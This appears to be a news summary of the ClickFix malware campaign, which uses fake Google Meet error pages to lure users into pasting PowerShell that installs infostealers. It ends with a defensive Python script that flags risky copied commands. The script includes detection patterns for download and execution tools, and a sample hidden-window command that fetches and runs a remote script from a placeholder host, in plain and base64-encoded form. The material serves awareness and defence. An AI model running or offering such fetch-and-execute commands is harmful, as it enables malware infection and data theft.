ClickFix Malware Campaign Exploits Google Meet to Steal Data on Windows and macOS

October 18, 2024
  • The ClickFix campaign, which has been active since September 2024, is targeting users of Google Workspace by luring them to fraudulent Google Meet conference pages.

  • This campaign delivers info-stealing malware for both Windows and macOS, utilizing deceptive tactics that bypass traditional security measures.

  • Windows users are particularly at risk, as they may encounter fake error messages about microphone issues that lead to the download of Stealc and Rhadamanthys infostealers.

  • Victims are often misled into copying malicious PowerShell code under the guise of fixing these supposed errors, which ultimately infects their systems.

  • Meanwhile, macOS users are tricked into downloading the AMOS Stealer malware through similar deceptive alerts.

  • This social engineering tactic is particularly effective because it requires users to manually execute commands, making it harder for standard security tools to detect the threat.

  • The impersonation of Google Meet in these campaigns has been attributed to two cybercrime groups, Slavic Nation Empire and Scamquerteo, which are believed to share resources.

  • Both groups utilize a shared ClickFix template that mimics Google Meet, indicating a coordinated effort in their cybercrime activities.

  • Malware associated with ClickFix includes a variety of threats such as DarkGate, Lumma Stealer, and others, showcasing the breadth of this cyber threat.

  • Experts warn that similar social engineering techniques may be employed in future malware distribution campaigns, highlighting the evolving nature of these threats.

  • To mitigate the risks associated with ClickFix, cybersecurity experts recommend that users remain vigilant, verify scripts before execution, and employ strong security measures.

  • Users should be cautious of unexpected error messages, avoid clicking on dubious links, and utilize two-factor authentication to enhance their security.
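
One way to act on the advice to verify scripts before execution is to triage a copied command for risky traits before anyone runs it. The sketch below is an added example, not code from the campaign reports or any vendor tool; the trait list, function names and sample commands are assumptions constructed for illustration, and the URL is a placeholder.

```python
import base64
import re

# Traits chosen for this example (assumptions, not indicators from the article).
TRAITS = {
    "hidden_window": re.compile(r"(?i)(?<![\w-])-w[a-z]*\s+hidden\b"),
    "download": re.compile(
        r"(?i)\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|"
        r"downloadstring|downloadfile|start-bitstransfer|curl|wget)\b"),
    "dynamic_exec": re.compile(r"(?i)\b(?:invoke-expression|iex)\b"),
}
# PowerShell accepts prefixes of -EncodedCommand (-e, -enc, ...) followed by base64.
ENC = re.compile(r"(?i)(?<![\w-])-e[a-z]*\s+([A-Za-z0-9+/]{20,}={0,2})")


def decode_encoded(cmd):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers bad base64 and bad UTF-16
        return None


def triage(text):
    """Return the sorted trait names found in the text and in any encoded layer."""
    findings = set()
    layer = text
    for _ in range(3):  # follow at most three nested encodings
        findings.update(name for name, rx in TRAITS.items() if rx.search(layer))
        inner = decode_encoded(layer)
        if inner is None:
            break
        findings.add("encoded_command")
        layer = inner
    return sorted(findings)


# Constructed samples; example.invalid is a reserved placeholder domain.
INNER = "iex (iwr https://example.invalid/fix.ps1)"
SAMPLE_PLAIN = 'powershell -w hidden -c "' + INNER + '"'
SAMPLE_ENCODED = ("powershell -NoProfile -enc "
                  + base64.b64encode(INNER.encode("utf-16-le")).decode())
SAMPLE_BENIGN = "Get-ChildItem -ErrorAction SilentlyContinue"

if __name__ == "__main__":
    for s in (SAMPLE_PLAIN, SAMPLE_ENCODED, SAMPLE_BENIGN):
        print(triage(s), "<-", s[:60])
```

An empty result does not mean a command is safe; the check only surfaces traits that warrant a closer look, and the encoded layer shows why reading the visible text alone is not enough.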

Summary based on 8 sources

